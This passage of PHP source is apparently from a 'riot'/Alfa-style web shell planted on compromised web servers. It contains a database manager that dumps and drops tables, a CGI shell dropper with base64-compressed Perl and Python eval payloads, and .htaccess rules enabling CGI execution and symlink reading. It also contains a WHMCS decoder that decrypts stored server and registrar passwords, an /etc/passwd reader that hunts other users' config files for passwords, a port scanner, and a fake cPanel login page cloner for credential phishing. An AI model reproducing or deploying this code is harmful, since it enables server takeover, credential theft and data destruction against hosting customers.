strlen($user) - 1; $sub_domain = str_replace(["-", "."], "", $domain); $five_user = substr($user, 0, $user_len); $five_domain = substr($sub_domain, 0, 
$user_len); if ($five_user == $five_domain) { if ($is_direct) { $cwd = str_replace("{user}", $user, $makepwd); } else { $expl = explode("}/", $makepwd); $cwd = $home . "/" . $expl[1]; } $html .= str_replace(["{count}", "{user}", "{url}", "{cwd}"], [$x++, $user, $domain, $cwd], $template); } else { $uknowns[$user] = $home; } } } $uknowns = array_unique($uknowns); foreach ($uknowns as $user => $home) { if ($is_direct) { $cwd = str_replace("{user}", $user, $makepwd); } else { $expl = explode("}/", $makepwd); $cwd = $home . "/" . $expl[1]; } $html .= str_replace(["{count}", "{user}", "{url}", "{cwd}"], [$x++, $user, "[?????]", $cwd], $template); } echo $html; } } echo " {count} {url} {user} Symlink [+] Symlink Function Disabled !
Error...
'; } echo ""; } echo "" . ($form_visibility != "none" ? " | Sql Manager |" . getConfigHtml("all") . "
" : "") . ""; if ($db->mysqli_connect_error) { echo '' . $db->mysqli_connect_error_msg . ""; } if (!empty($curr_mysql_id)) { $sql_title_db = ""; if (!empty($_POST["sql_base"])) { $sql_title_db = "d.querySelector('#tab_" . $curr_mysql_id . " span').innerHTML='" . addslashes($_POST["sql_base"]) . "';"; } echo ""; } if (isset($db) && $db->link) { if (!empty($_POST["sql_base"])) { echo ""; riotfooter(); } function riotSql_manager_api() { $db = $_POST["riot1"]; $type = $_POST["riot2"]; $sql_count = $_POST["riot3"] == "true" ? true : false; $db = @json_decode($db, true); $conn = @mysqli_connect($db["host"], $db["user"], $db["pass"], $db["db"]); @mysqli_set_charset($conn, "utf8"); if ($conn) { if ($type == "load_all_tables") { $tables = []; $q_tables = @mysqli_query($conn, "SELECT `table_schema`, `table_name` FROM `information_schema`.`tables` WHERE `table_schema` IN ('" . implode("','", $db["databases"]) . "');"); $count = 0; while ($row = @mysqli_fetch_assoc($q_tables)) { if ($sql_count) { $count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `" . $row["table_schema"] . "`.`" . $row["table_name"] . "`"); if ($count_q) { $count = @mysqli_fetch_row($count_q); $count = $count[0]; } } $tables[$row["table_schema"]][] = [ "name" => $row["table_name"], "count" => (int) $count, ]; } foreach ($db["databases"] as $db) { if (!isset($tables[$db])) { $tables[$db] = null; } } echo @json_encode($tables); } elseif ($type == "dump_drop") { if ($db["mode"] == "drop") { foreach ($db["tables"] as $table) { @mysqli_query($conn, "DROP TABLE `" . $table . "`;"); } $tables = []; $q_tables = @mysqli_query($conn, "SHOW TABLES;"); $count = 0; while ($row = @mysqli_fetch_array($q_tables)) { if ($sql_count) { $count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `" . $row[0] . 
"`"); if ($count_q) { $count = @mysqli_fetch_row($count_q); $count = $count[0]; } } $tables[] = ["name" => $row[0], "count" => (int) $count]; } echo @json_encode($tables); } else { if (strlen(riotEx("mysqldump")) > 0) { riotEx("mysqldump --single-transaction --host=\"" . $db["host"] . "\" --user=\"" . $db["user"] . "\" --password=\"" . $db["pass"] . "\" " . $db["db"] . " " . implode(" ", $db["tables"]) . " > " . $db["dump_file"]); } else { $fp = @fopen($db["dump_file"], "w"); foreach ($db["tables"] as $table) { $res = @mysqli_query($conn, "SHOW CREATE TABLE `" . $table . "`"); $create = @mysqli_fetch_array($res); $sql = "DROP TABLE IF EXISTS `" . $table . "`;\n" . $create[1] . ";\n"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $tbl_data = @mysqli_query($conn, "SELECT * FROM `" . $table . "`"); $head = true; while ($item = @mysqli_fetch_assoc($tbl_data)) { $columns = []; foreach ($item as $k => $v) { if ($v == null) { $item[$k] = "''"; } elseif (is_numeric($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysqli_real_escape_string($conn, $v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql = "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ")"; $head = false; } else { $sql = "\n\t,(" . implode(", ", $item) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } if (!$head) { if ($fp) { fwrite($fp, ";\n\n"); } else { echo ";\n\n"; } } } } echo @json_encode([ "status" => true, "file" => $db["dump_file"], ]); } } elseif ($type == "load_tables") { $tables = []; $q_tables = @mysqli_query($conn, "SHOW TABLES;"); $count = 0; while ($row = @mysqli_fetch_array($q_tables)) { if ($sql_count) { $count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `" . $row[0] . 
"`"); if ($count_q) { $count = @mysqli_fetch_row($count_q); $count = $count[0]; } } $tables[] = ["name" => $row[0], "count" => (int) $count]; } echo @json_encode($tables); } elseif ($type == "alter") { $db["alter"]["type"] = strtolower($db["alter"]["type"]); $inputs = $db["alter"]["type"] . "(" . $db["alter"]["input"] . ")"; $text_input = ["longtext", "text", "mediumtext", "tinytext"]; if (in_array($db["alter"]["type"], $text_input)) { $inputs = $db["alter"]["type"]; } @mysqli_query($conn, "ALTER TABLE `" . $db["table"] . "` MODIFY COLUMN `" . $db["column"] . "` " . $inputs); $error = @mysqli_error($conn); if ($error) { echo $error; } else { echo "ok"; } } elseif ($type == "edit" || $type == "delete" || $type == "delete_all") { if ($type == "edit") { $q = @mysqli_query($conn, "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` WHERE `" . $db["col_key"] . "` = '" . addslashes($db["key"]) . "' LIMIT 0,1"); $row = @mysqli_fetch_assoc($q); if ($row) { $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE, DATA_TYPE as type FROM information_schema.columns WHERE `TABLE_SCHEMA` = '" . $db["db"] . "' AND `TABLE_NAME` = '" . $db["table"] . 
"'"); $columns = []; $edit_data = []; while ($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) { $input = ["col_type" => $row2["COLUMN_TYPE"]]; $row2["type"] = strtolower($row2["type"]); switch ($row2["type"]) { case "longtext": case "text": case "mediumtext": case "tinytext": $input["tag"] = "textarea"; break; case "int": case "smallint": case "bigint": case "tinyint": case "mediumint": $input["tag"] = "input"; $input["type"] = "number"; break; default: $input["tag"] = "input"; $input["type"] = "text"; } $columns[$row2["name"]] = $input; } foreach ($row as $key => $v) { $edit_data[] = [ "col" => $key, "value" => htmlspecialchars($v, ENT_QUOTES, "UTF-8"), "type" => $columns[$key], ]; } echo @json_encode($edit_data); } } else { if ($type == "delete_all") { $rows = implode("', '", $db["rows"]); } else { $rows = addslashes($db["key"]); } $query = "DELETE FROM `" . $db["db"] . "`.`" . $db["table"] . "` WHERE `" . $db["col_key"] . "` IN ('" . $rows . "')"; @mysqli_query($conn, $query); $error = @mysqli_error($conn); if ($error) { $status = false; } else { $status = true; } echo @json_encode([ "status" => $status, "error" => $error, "query" => $query, ]); } } elseif ($type == "update") { $query = "UPDATE `" . $db["db"] . "`.`" . $db["table"] . "` SET "; foreach ($db["data"] as $col => $val) { $query .= "`" . $col . "` = '" . mysqli_real_escape_string($conn, $val) . "',"; } $query = substr($query, 0, -1); $query .= "WHERE `" . $db["col_key"] . "` = '" . $db["key"] . "'"; $res = @mysqli_query($conn, $query); echo @json_encode([ "status" => $res, "error" => @mysqli_error($conn), ]); } elseif ($type == "insert") { $query = "INSERT INTO `" . $db["db"] . "`.`" . $db["table"] . "` "; foreach ($db["data"] as $col => $val) { $cols .= $col . ","; $vals .= "'" . mysqli_real_escape_string($conn, $val) . "',"; } $cols = substr($cols, 0, -1); $vals = substr($vals, 0, -1); $query = $query . "(" . $cols . ")" . "VALUES(" . $vals . 
")"; $res = @mysqli_query($conn, $query); echo @json_encode([ "status" => $res, "error" => @mysqli_error($conn), ]); } else { $pages = 0; $title = false; $query = ""; $tbl_content = '<<"; } else { echo htmlspecialchars($db->error()); } echo ""; foreach ($database_list as $db_name) { echo '
- ' . $db_name . '
'; if ($db_name == $_POST["sql_base"]) { $db->selectdb($_POST["sql_base"]); $tbls_res = $db->listTables(); echo '"; } echo "
- '; while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM `" . $value . "`")); } $value = htmlspecialchars($value); echo "
- "; } echo '
" . $value . "" . (empty($_POST["sql_count"]) ? " " : " ({$n["n"]})") . "'; } echo ""; echo "ResultQuerySearchStructureInsert"; } echo "'; $line = 0; $tables = []; $columns = []; if ($type == "load_data") { $query = "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` LIMIT 0,30"; $tbl_count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `" . $db["db"] . "`.`" . $db["table"] . "`"); $tbl_count = @mysqli_fetch_row($tbl_count_q); $columns_query = @mysqli_query( $conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE as type, COLLATION_NAME as collation, DATA_TYPE as data_type, CHARACTER_MAXIMUM_LENGTH as type_value FROM information_schema.columns WHERE `TABLE_SCHEMA` = '" . $db["db"] . "' AND `TABLE_NAME` = '" . $db["table"] . "'" ); while ($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) { $columns[] = $row2; } if ($tbl_count[0] > 30) { $pages = ceil($tbl_count[0] / 30); } } elseif ($type == "query") { $query = $db["query"]; } elseif ($type == "page") { $db["page"] = (int) $db["page"] - 1; $query = "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` LIMIT " . $db["page"] * 30 . ",30"; } elseif ($type == "search") { $search = ""; $search_noval = ["= ''", "!= ''", "IS NULL", "IS NOT NULL"]; foreach ($db["search"] as $col => $val) { $search_noval_r = in_array($val["opt"], $search_noval); if (empty($val["value"]) && !$search_noval_r) { continue; } if (strstr($val["opt"], "...") || $search_noval_r) { $val["opt"] = str_replace("...", $val["value"], $val["opt"]); $search .= $col . " " . $val["opt"] . " AND "; } else { $search .= $col . " " . $val["opt"] . " '" . addslashes($val["value"]) . "' AND "; } } $search .= "1=1"; $query = "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` WHERE " . 
$search; } $q_tables = @mysqli_query($conn, $query); if (!$q_tables) { echo @json_encode([ "status" => false, "error" => @mysqli_error($conn), "query" => $query, ]); return false; } $col_key = @mysqli_query($conn, "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '" . @addslashes($db["db"]) . "' AND TABLE_NAME = '" . @addslashes($db["table"]) . "' AND COLUMN_KEY = 'PRI'"); if ($col_key) { $col_key = @mysqli_fetch_row($col_key); $col_key = $col_key[0]; if (!empty($col_key)) { $tbl_content = '
'; } } else { $col_key = false; } while ($item = @mysqli_fetch_assoc($q_tables)) { if (!$title) { $tbl_content .= '
"; if (!$title) { $tbl_content = "'; if ($col_key) { $tbl_content .= ' Edit Delete '; } foreach ($item as $key => $value) { $tbl_content .= "" . $key . " "; } reset($item); $title = true; $tbl_content .= ""; } if ($col_key) { $cacheMsg = ' Edit Delete '; } $tbl_content .= '' . $cacheMsg; $line++; foreach ($item as $key => $value) { if ($value == null) { $tbl_content .= " "; } $tbl_content .= "null "; } else { $tbl_content .= "" . nl2br(htmlspecialchars($value)) . " "; } } $tbl_content .= "Table is empty..."; } echo @json_encode([ "status" => true, "table" => $tbl_content, "columns" => $columns, "pages" => $pages, "query" => $query, ]); } @mysqli_close($conn); } } function riotcgishell() { riothead(); $div = ""; riotCreateParentFolder(); @chdir($GLOBALS["home_cwd"] . "/" . __SYS_CONFIG_FOLDER__); if (!in_array($_POST["riot1"], ["perl", "py"])) { $div = ""; echo ' | CGI Shell || Perl | | Python | '; } if (isset($_POST["riot1"]) && in_array($_POST["riot1"], ["perl", "py"])) { @mkdir("cgiriot", 0755); @chdir("cgiriot"); riotcgihtaccess("cgi"); $name = $_POST["riot1"] . ".riot"; $perl = "#!/usr/bin/perl -I/usr/local/bandmin" . "\n" . 'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));'; $py = "#!/usr/bin/python" . "\nimport zlib, base64\n" . 
'eval(compile(zlib.decompress(base64.b64decode("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")),\'
\',\'exec\'))'; if ($_POST["riot1"] == "perl") { $code = $perl; } else { $code = $py; } if (__write_file($name, $code)) { @chmod($name, 0755); echo ''; } } echo $div; riotfooter(); } function riotWhmcs() { riothead(); echo " "; function decrypt($string, $cc_encryption_hash) { $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash); $hash_key = _hash($key); $hash_length = strlen($hash_key); $string = __ZGVjb2Rlcg($string); $tmp_iv = substr($string, 0, $hash_length); $string = substr($string, $hash_length, strlen($string) - $hash_length); $iv = $out = ""; $c = 0; while ($c < $hash_length) { $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c])); ++$c; } $key = $iv; $c = 0; while ($c < strlen($string)) { if ($c != 0 and $c % $hash_length == 0) { $key = _hash($key . substr($out, $c - $hash_length, $hash_length)); } $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c])); ++$c; } return $out; } function _hash($string) { if (function_exists("sha1")) { $hash = sha1($string); } else { $hash = md5($string); } $out = ""; $c = 0; while ($c < strlen($hash)) { $out .= chr(hexdec($hash[$c] . $hash[$c + 1])); $c += 2; } return $out; } AlfaNum(8, 9, 10); echo ""; riotfooter(); } function riotportscanner() { riothead(); echo '"; if ($_POST["riot5"] != "") { $db_host = $_POST["riot7"]; $db_username = $_POST["riot3"]; $db_password = $_POST["riot4"]; $db_name = $_POST["riot5"]; $cc_encryption_hash = $_POST["riot6"]; echo __pre(); ($conn = @mysqli_connect($db_host, $db_username, $db_password, $db_name)) or die(mysqli_error($conn)); $query = mysqli_query($conn, "SELECT * FROM tblservers"); $num = mysqli_num_rows($query); if ($num > 0) { for ($i = 0; $i <= $num - 1; $i++) { $v = @mysqli_fetch_array($query); $ipaddress = $v["ipaddress"]; $username = $v["username"]; $type = $v["type"]; $active = $v["active"]; $hostname = $v["hostname"]; echo " | WHMCS DeCoder |" . getConfigHtml("whmcs") . "
"; } $query1 = @mysqli_query($conn, "SELECT * FROM tblregistrars"); $num1 = @mysqli_num_rows($query1); if ($num1 > 0) { for ($i = 0; $i <= $num1 - 1; $i++) { $v = mysqli_fetch_array($query1); $registrar = $v["registrar"]; $setting = $v["setting"]; $value = decrypt($v["value"], $cc_encryption_hash); if ($value == "") { $value = 0; } echo " "; $password = decrypt($v["password"], $cc_encryption_hash); echo "
"; echo " Type $type "; echo " Active $active "; echo " Hostname $hostname "; echo " Ip $ipaddress "; echo " Username $username "; echo " Password $password Domain Reseller "; echo " "; } } } else { __alert('tblservers is Empty...!'); } } echo " "; echo "
"; echo " Register $registrar "; echo " Setting $setting "; echo " Value $value "; riotfooter(); } function riotcgihtaccess($m, $d = "", $symname = false) { $readme = ""; if ($symname) { $readme = "\nReadmeName " . trim($symname); } if ($m == "cgi") { $code = "#Coded By IDM\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .riot\nAddHandler cgi-script .riot"; } elseif ($m == "sym") { $code = "#Coded By IDM\nOptions Indexes FollowSymLinks\nDirectoryIndex riotexec.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all"; } elseif ($m == "shtml") { $code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml"; } @__write_file($d . ".htaccess", $code); } function riotbasedir() { riothead(); echo ' | Port Scaner |
'; $start = strip_tags($_POST["riot2"]); $end = strip_tags($_POST["riot3"]); $host = strip_tags($_POST["riot4"]); if (isset($_POST["riot4"]) && is_numeric($_POST["riot3"]) && is_numeric($_POST["riot2"])) { echo __pre(); $packetContent = "GET / HTTP/1.1\r\n\r\n"; if (ctype_xdigit($packetContent)) { $packetContent = @pack("H*", $packetContent); } else { $packetContent = str_replace(["\r", "\n"], "", $packetContent); $packetContent = str_replace(["\\r", "\\n"], ["\r", "\n"], $packetContent); } for ($i = $start; $i <= $end; $i++) { $sock = @fsockopen($host, $i, $errno, $errstr, 3); if ($sock) { stream_set_timeout($sock, 5); fwrite($sock, $packetContent . "\r\n\r\n\x00"); $counter = 0; $maxtry = 1; $bin = ""; do { $line = fgets($sock, 1024); if (trim($line) == "") { $counter++; } $bin .= $line; } while ($counter < $maxtry); fclose($sock); echo ""; } flush(); } } echo " Port $i is open
"; echo ""; riotfooter(); } function riotziper() { riothead(); AlfaNum(8, 9, 10); echo ''; $passwd = _riot_file("/etc/passwd"); if (is_array($passwd)) { $users = []; $makepwd = riotMakePwd(); $basedir = @ini_get("open_basedir"); $safe_mode = @ini_get("safe_mode"); if (_riot_can_runCommand(true, false) && ($basedir || $safe_mode)) { $bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP"; $tmp_path = riotWriteTocgiapi("basedir.riot", $bash); $bash_users = riotEx("cd " . $tmp_path . "/riotcgiapi;sh basedir.riot " . $makepwd, false, true, true); $users = json_decode($bash_users, true); $x = count($users); if ($x >= 2) { array_pop($users); --$x; } } if (!$basedir && !$safe_mode) { $x = 0; foreach ($passwd as $str) { $pos = strpos($str, ":"); $username = substr($str, 0, $pos); $dirz = str_replace("{user}", $username, $makepwd); if ($username != "") { if (@is_readable($dirz)) { array_push($users, $username); $x++; } } } } echo " | Open Base Dir |
"; echo "[+] Founded " . sizeof($passwd) . " entrys in /etc/passwd\n" . "
"; echo "[+] Founded " . $x . " readable " . str_replace("{user}", "*", $makepwd) . " directories\n" . "
"; echo "[~] Searching for passwords in config files...\n\n" . "
"; foreach ($users as $user) { if (empty($user)) { continue; } $path = str_replace("{user}", $user, $makepwd); echo "
"; } } else { echo '[-] Error : coudn`t read /etc/passwd [-] '; } echo "
"; echo ""; riotfooter(); } function __riotziper($source, $destination) { if (!extension_loaded("zip") || !file_exists($source)) { return false; } $zip = new ZipArchive(); if (!$zip->open($destination, ZIPARCHIVE::CREATE)) { return false; } $source = str_replace("\\", "/", realpath($source)); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = str_replace("\\", "/", $file); if (in_array(substr($file, strrpos($file, "/") + 1), [".", ".."])) { continue; } $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . "/", "", $file . "/")); } elseif (is_file($file) === true) { $zip->addFromString(str_replace($source . "/", "", $file), file_get_contents($file)); } } } elseif (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } return $zip->close(); } function riotdeziper() { riothead(); AlfaNum(8, 9, 10); echo ''; if (isset($_POST["riot5"]) && $_POST["riot5"] == ">>") { $dirzip = $_POST["riot3"]; $zipfile = $_POST["riot4"]; if ($GLOBALS["sys"] != "unix" && _riot_can_runCommand(true, true)) { riotEx("powershell Compress-Archive -Path '" . addslashes($dirzip) . "' -DestinationPath '" . addslashes(basename($zipfile)) . "'"); echo __pre() . ' | Compressor |"; } elseif ($GLOBALS["sys"] == "unix" && _riot_can_runCommand(true, true)) { riotEx("cd '" . addslashes(dirname($zipfile)) . "';zip -r '" . addslashes(basename($zipfile)) . "' '" . addslashes($dirzip) . "'"); echo __pre() . ' Done -> ' . $zipfile . "
"; } elseif (class_exists("ZipArchive")) { if (__riotziper($dirzip, $zipfile)) { echo __pre() . ' Done -> ' . $zipfile . "
"; } else { echo __pre() . ' Success...!
' . $zipfile . "'; } } } echo " ERROR!!!...
"; riotfooter(); } function Alfa_StrSearcher($dir, $string, $ext, $e, $arr = []) { if (@is_dir($dir)) { $files = @scandir($dir); foreach ($files as $key => $value) { $path = @realpath($dir . DIRECTORY_SEPARATOR . $value); if (!@is_dir($path)) { if ($ext != "*") { $f = basename($path); $f = explode(".", $f); $f = end($f); if ($f != $ext) { continue; } } if ($e == "str") { $content = @file_get_contents($path); if (strpos($content, $string) !== false) { echo str_replace("\\", "/", $path) . "'; if (isset($_POST["riot5"]) && $_POST["riot5"] == ">>") { $dirzip = $_POST["riot3"]; $zipfile = $_POST["riot4"]; if (@!is_dir($zipfile)) { @mkdir($zipfile, 0777, true); } $finfo = ""; $file_type = ""; if (function_exists("finfo_open")) { $finfo = @finfo_open(FILEINFO_MIME_TYPE); $file_type = @finfo_file($finfo, $dirzip); @finfo_close($finfo); } else { if ($GLOBALS["sys"] == "unix" && _riot_can_runCommand(true, true)) { $file_type = riotEx("file -b --mime-type " . $dirzip); } } if ($GLOBALS["sys"] != "unix" && _riot_can_runCommand(true, true)) { riotEx("powershell expand-archive -path '" . addslashes($dirzip) . "' -destinationpath '" . addslashes(basename($zipfile)) . "'"); echo __pre() . ' | DeCompressor |"; } elseif ($GLOBALS["sys"] == "unix" && !empty($file_type) && _riot_can_runCommand(true, true) && (strlen(riotEx("which unzip")) > 0 || strlen(riotEx("which tar")) > 0 || strlen(riotEx("which gunzip")) > 0)) { switch ($file_type) { case "application/zip": riotEx("cd '" . addslashes($zipfile) . "';unzip '" . addslashes($dirzip) . "'"); break; case "application/x-tar": case "application/x-gzip": case "application/x-gtar": if (strstr(basename($dirzip), ".tar.gz") || strstr(basename($dirzip), ".tar")) { riotEx("cd '" . addslashes($zipfile) . "';tar xzf '" . addslashes($dirzip) . "'"); } else { riotEx("cd '" . addslashes($zipfile) . "';gunzip '" . addslashes($dirzip) . "'"); } break; } echo __pre() . ' Done -> ' . $zipfile . "
'; } elseif (class_exists("ZipArchive")) { $itsok = false; if (emtpy($file_type)) { $file_type = "application/zip"; } switch ($file_type) { case "application/zip": $zip = new ZipArchive(); $res = $zip->open($dirzip); if ($res) { $zip->extractTo($zipfile); $zip->close(); $itsok = true; } break; case "application/x-tar": case "application/x-gzip": case "application/x-gtar": if (strstr(basename($dirzip), ".tar.gz")) { $new_file = $zipfile . "/" . basename($dirzip); @copy($dirzip, $new_file); $new_tar = str_replace(".tar.gz", ".tar", $new_file); try { $p = new PharData($new_file); $p->decompress(); $phar = new PharData($new_tar); $phar->extractTo($zipfile); @unlink($new_file); @unlink($new_tar); $itsok = true; } catch (Exception $e) { } } else { try { $phar = new PharData($dirzip); $phar->extractTo($zipfile); $itsok = true; } catch (Exception $e) { } } break; } if ($itsok) { echo __pre() . ' Done -> ' . $zipfile . ' [ View Folder ]
'; } else { echo __pre() . ' Success...!
' . $zipfile . ' [ View Folder ]'; } } } echo " ERROR!!!...
"; } } else { if (strstr($value, $string)) { echo str_replace("\\", "/", $path) . "
"; } } $results[] = $path; } elseif ($value != "." && $value != "..") { Alfa_StrSearcher($path, $string, $ext, $e, $results); $results[] = $path; } } } } function riotfakepage() { riothead(); AlfaNum(9, 10); echo '"; riotfooter(); } function riotarchive_manager() { riothead(); $file = $_POST["riot2"]; if (!file_exists($file)) { $file = $GLOBALS["cwd"]; } $rand_id = rand(9999, 999999); echo '
| Host Manager Fake page |
'; $clone_page = $_POST["riot1"]; $fake_root = $_POST["riot2"]; $logto = $_POST["riot4"]; $panel = $_POST["riot5"]; $inject_to = $_POST["riot6"]; $bind_on = $_POST["riot7"]; $count = $_POST["riot8"]; if (!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST["riot3"] == ">>") { echo __pre(); $target = $clone_page; $curl = new AlfaCURL(); $source_page = $curl->Send($target); if (!empty($source_page)) { $matched_form = ""; if ($panel == "cpanel") { if (preg_match('#"; riotfooter(); } function __riot_open_archive_file($arch, $base_id = 0) { try { $files = []; $dirs = []; $archive = new PharData($arch); foreach ($archive as $file) { $file_modify = @date("Y-m-d H:i:s", @filemtime($file->getPathname())); if ($file->isDir()) { $dirs[] = [ "name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "dir", "modify" => $file_modify, ]; } else { $file_size = @filesize($file->getPathname()); $files[] = [ "name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "file", "modify" => $file_modify, "size" => $file_size, ]; } } function __riot_open_archive_usort($a, $b) { return strcmp(strtolower($a["name"]), strtolower($b["name"])) * 1; } usort($dirs, "__riot_open_archive_usort"); usort($files, "__riot_open_archive_usort"); $files = array_merge($dirs, $files); 